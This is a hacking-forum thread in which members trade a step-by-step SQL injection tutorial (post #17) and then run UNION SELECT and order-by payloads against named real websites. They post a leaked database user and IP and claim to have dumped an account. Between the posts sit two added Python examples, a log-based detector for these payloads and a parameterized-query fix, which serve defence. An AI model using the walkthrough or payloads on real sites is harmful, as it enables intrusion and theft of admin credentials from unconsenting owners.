[BAT]Auto Easy Sqli Vuln Finder
28-02-2010, 01:25 PM, (This post was last modified: 28-02-2010, 02:15 PM by tau9eh.)
Post: #16
RE: [BAT]Auto Easy Sqli Vuln Finder
Yup.. I installed the PHP you gave me..
I've repaired it again...
It's working now :D

Hehehe.. so after that, what do I do to hack these sites :D????
Reply
28-02-2010, 01:28 PM, (This post was last modified: 28-02-2010, 01:31 PM by mrlock.)
Post: #17
RE: [BAT]Auto Easy Sqli Vuln Finder
Search TBD here for sqli hack
then learn :D
I wrote this one myself :D
Code:
#######################################################################################
#                                SQli Step By Step                                    #                
#                                 [Malay Version]                                     #              
#                           Created By Haikalxy a.k.a Mr.Lock                         #
#                       Thanks to wanbotak,XshimeX, and all tbd crewz                 #
#######################################################################################


**********use sqliscanner.php to find a list of sites vulnerable to sqli***************
command :
cd c:\program files\php
php.exe c:\sqliscanner.php

########################################################################################
**************then use schemafuzz.py to find the id where the error sits***************
command :
c:\schemafuzz.py
c:\schemafuzz.py -u "www.websiteape.com/index.php?id=12" --findcol

########################################################################################
******once you have the spot where the error sits, open that link in a browser and see which number shows up &
then find out which version*******
use : version() or @@version, placed at the number that showed up
eg:
5
command :
www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,version(),6,7,8,9--
www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,@@version,6,7,8,9--

########################################################################################
*********************************then find its database name*****************************
use : database()
command :
www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,database(),6,7,8,9--
eg :
kucing12

##########################################################################################
*********once you have the database name, use schemafuzz.py again to fuzz its database****
command :
c:\schemafuzz.py -u "www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,darkc0de,6,7,8,9--" -D kucing12 --fuzz
eg :
find table "admin"
column "username"
column "pass"
column "id"

##########################################################################################
*********************************then use the earlier link and ***************************
put the column name in place of darkcode and add from plus the table name
eg :
to find the username
www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,username,6,7,8,9 from admin
to find the password
www.websiteape.com/index.php?id=12+union+all+select+0,1,2,3,4,pass,6,7,8,9 from admin
result :
username :admin
password :4ccess4all
if
username :admin
password :6514684s84fs5648648s <----[if the password looks like this, crack this md5 password at any md5 cracker site, or use md5 brutehash perl if you can't find the pass on that cracker site]

##########################################################################################
**********************use an admin page finder to find the admin login page **************

Pmr are bust*d GayFace


Reply
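A defender's view of the walkthrough in post #17, as an added example that is not part of the original thread: a small access-log scanner that flags the request shapes the walkthrough generates (a trailing quote on a numeric parameter, `order by N`, `union ... select`, and `version()` / `@@version` / `database()` fingerprinting). The log lines, IP addresses and rule names are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Rule names are illustrative; each regex runs on the URL-decoded query string.
RULES = [
    ("quote_probe", re.compile(r"=\d+'\s*(&|$)")),
    ("order_by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("db_fingerprint", re.compile(r"\b(version|database)\s*\(\s*\)|@@version", re.I)),
]

# Common/combined access-log prefix: ip, ident, user, [time], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [28/Feb/2010:13:20:01 +0800] "GET /news_view.php?id=38' HTTP/1.1" 200 512
198.51.100.7 - - [28/Feb/2010:13:48:10 +0800] "GET /news_view.php?id=-1+order+by+20-- HTTP/1.1" 200 498
198.51.100.7 - - [28/Feb/2010:14:19:33 +0800] "GET /news_view.php?id=12+union+all+select+0,1,2,3,4,version(),6,7,8,9-- HTTP/1.1" 200 731
192.0.2.44 - - [28/Feb/2010:14:20:02 +0800] "GET /news_view.php?id=38 HTTP/1.1" 200 2210
192.0.2.44 - - [28/Feb/2010:14:21:15 +0800] "GET /search.php?q=order+by+phone HTTP/1.1" 200 900
""".splitlines()


def classify(target):
    """Return the names of all rules matching the decoded query string of a request target."""
    query = unquote_plus(urlsplit(target).query)  # '+' -> space, %28 -> '(' and so on
    return [name for name, rx in RULES if rx.search(query)]


def scan(lines):
    """Group flagged requests by client IP: {ip: [(target, [rule names]), ...]}."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        tags = classify(m["target"])
        if tags:
            hits.setdefault(m["ip"], []).append((m["target"], tags))
    return hits


if __name__ == "__main__":
    for ip, reqs in scan(SAMPLE_LOG).items():
        print(ip, len(reqs), "flagged requests")
        for target, tags in reqs:
            print("   ", ",".join(tags), target)
```

Several distinct rule hits from one client within a short window, as for 198.51.100.7 here, are a stronger signal than any single match.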
28-02-2010, 01:32 PM,
Post: #18
RE: [BAT]Auto Easy Sqli Vuln Finder
mr lock.. you need to provide a user manual for it too.. otherwise the n00bs will really struggle to learn.. once there's a manual you can tell them "PLZ RTFM 1st!" :D
Reply
28-02-2010, 01:34 PM,
Post: #19
RE: [BAT]Auto Easy Sqli Vuln Finder
Hehe.. I'm too lazy :D
You do it :D~~
heeeeee
Reply
28-02-2010, 01:34 PM,
Post: #20
RE: [BAT]Auto Easy Sqli Vuln Finder
(28-02-2010, 01:32 PM)sil Wrote: mr lock.. you need to provide a user manual for it too.. otherwise the n00bs will really struggle to learn.. once there's a manual you can tell them "PLZ RTFM 1st!" :D

Define:PLZ RTFM 1ST! : Please read the fucking manual first!

Right?

Thanks masta sil and masta mrlock ;)
"You're what you achieve. Therefore be the man you wanted to be."
Reply
28-02-2010, 01:39 PM, (This post was last modified: 28-02-2010, 01:39 PM by mrlock.)
Post: #21
RE: [BAT]Auto Easy Sqli Vuln Finder
@hellxox
You're the masta :D

mr lock is a noob :(
Reply
28-02-2010, 01:48 PM, (This post was last modified: 28-02-2010, 01:48 PM by tau9eh.)
Post: #22
RE: [BAT]Auto Easy Sqli Vuln Finder
I tried this site up to 20.. the error still hasn't gone away--> http://www.mondopop.it/news_view.php?id=-1+order+by+20--

How high do you guys usually go??
Reply
28-02-2010, 01:50 PM,
Post: #23
RE: [BAT]Auto Easy Sqli Vuln Finder
(28-02-2010, 01:48 PM)tau9eh Wrote: I tried this site up to 20.. the error still hasn't gone away--> http://www.mondopop.it/news_view.php?id=-1+order+by+20--

How high do you guys usually go??

40 - 150. Haven't done sqli in a long time :(
Reply
28-02-2010, 01:57 PM,
Post: #24
RE: [BAT]Auto Easy Sqli Vuln Finder
I'm already up to 100 now, surely it can't still not be gone..
Reply
28-02-2010, 02:14 PM,
Post: #25
RE: [BAT]Auto Easy Sqli Vuln Finder
(28-02-2010, 01:48 PM)tau9eh Wrote: I tried this site up to 20.. the error still hasn't gone away--> http://www.mondopop.it/news_view.php?id=-1+order+by+20--

How high do you guys usually go??


Sql231921@62.149.141.123 : Sql231921_1 : 5.0.82sp1-log

tools without knowledge = skiddies
tools + knowledge = u feel the different
Reply
28-02-2010, 02:14 PM, (This post was last modified: 28-02-2010, 02:15 PM by mrlock.)
Post: #26
RE: [BAT]Auto Easy Sqli Vuln Finder
If you're too lazy to +order+by+
use schemafuzz.py
command
c:\schemafuzz.py -u "www.websitesqli.com/index.php?id=56" --findcol
it will search automatically ;)
@ahls.
when will masta pass down the knowledge :D
waiting here :D
Reply
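The server-side cause of the `order by` and `union select` behaviour discussed in posts #22 to #26, and the fix, as an added example that is not part of the original thread. It uses Python's `sqlite3` as a stand-in for the PHP/MySQL pages in the thread; the table layout, rows and function names are constructed assumptions.

```python
import re
import sqlite3


def make_db():
    """In-memory database with constructed sample rows (stand-in for the site's MySQL DB)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO news VALUES (12, 'Launch', 'Constructed sample row');
        CREATE TABLE admin (id INTEGER, username TEXT, pass TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'constructed-secret');
    """)
    return db


def news_view_vulnerable(db, raw_id):
    # Weak form: the request parameter is concatenated into the SQL text,
    # so anything after the number is parsed as SQL by the database.
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def news_view_hardened(db, raw_id):
    # 1) Allow-list the input: an article id is 1-9 ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    # 2) Bind the value as a parameter so it can never change the query structure.
    return db.execute(
        "SELECT id, title, body FROM news WHERE id = ?", (int(raw_id),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "12 union all select id, username, pass from admin"  # '+' decodes to space
    print("vulnerable:", news_view_vulnerable(db, probe))   # leaks the admin row
    print("hardened:  ", news_view_hardened(db, probe))     # []
    try:
        news_view_vulnerable(db, "12 order by 20")           # column-count probe
    except sqlite3.OperationalError as exc:
        print("vulnerable order-by probe -> database error:", exc)
    print("hardened order-by probe ->", news_view_hardened(db, "12 order by 20"))
```

With the hardened handler the probes produce neither a database error nor extra rows, which removes the feedback that column counting depends on.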
28-02-2010, 02:19 PM,
Post: #27
RE: [BAT]Auto Easy Sqli Vuln Finder
http://www.mondopop.it/news_view.php?id=...6,7,8,9,10
Reply
28-02-2010, 02:27 PM, (This post was last modified: 28-02-2010, 02:30 PM by tau9eh.)
Post: #28
RE: [BAT]Auto Easy Sqli Vuln Finder
(28-02-2010, 02:14 PM)Ahlspiess Wrote:
(28-02-2010, 01:48 PM)tau9eh Wrote: I tried this site up to 20.. the error still hasn't gone away--> http://www.mondopop.it/news_view.php?id=-1+order+by+20--

How high do you guys usually go??


Sql231921@62.149.141.123 : Sql231921_1 : 5.0.82sp1-log

tools without knowledge = skiddies
tools + knowledge = u feel the different
Sql231921@62.149.141.123 : Sql231921_1 : 5.0.82sp1-log <-- what is this??

I'm only just starting to learn..

(28-02-2010, 02:14 PM)mr lock Wrote: If you're too lazy to +order+by+
use schemafuzz.py
command
c:\schemafuzz.py -u "www.websitesqli.com/index.php?id=56" --findcol
it will search automatically ;)
@ahls.
when will masta pass down the knowledge :D
waiting here :D

Hang on... I'll ask about schemafuzz.py later
I found a really good site.. :D

http://www.comprousa.com/en/news_view.ph...lect+1,2,3--

but when I check its version it comes out like this..

http://www.comprousa.com/en/news_view.ph...ersion(),3--


(28-02-2010, 02:19 PM)Ahlspiess Wrote: http://www.mondopop.it/news_view.php?id=...6,7,8,9,10

You got in fast..
share how you did it.. :D
Reply
28-02-2010, 02:29 PM, (This post was last modified: 28-02-2010, 02:45 PM by mrlock.)
Post: #29
RE: [BAT]Auto Easy Sqli Vuln Finder
Bro, you put version in the wrong place :D
replace version() with no 2 :D
http://www.comprousa.com/en/news_view.ph...on%28%29,3--
this one was done by skiddies :)
mondopop.it dumped account
[Image: 45533282.png]
;)
Reply
28-02-2010, 03:01 PM,
Post: #30
RE: [BAT]Auto Easy Sqli Vuln Finder
(28-02-2010, 02:29 PM)mr lock Wrote: Bro, you put version in the wrong place :D
replace version() with no 2 :D
http://www.comprousa.com/en/news_view.ph...on%28%29,3--

Heh heh, so that's how... thanks bro..

.........................................

http://www.comprousa.com/en/news_view.ph...base%28%29--

I took reviews.. then I converted it at http://piclist.com/techref/ascii.htm

it came out as --> 72657669657773

http://www.comprousa.com/en/news_view.ph...7669657773--

[Image: revieww.jpg]
Hmm... what do I have to do after that.. I'm confused

(28-02-2010, 02:29 PM)mr lock Wrote: this one was done by skiddies :)
mondopop.it dumped account
[Image: 45533282.png]
;)
and what is this now..??
Reply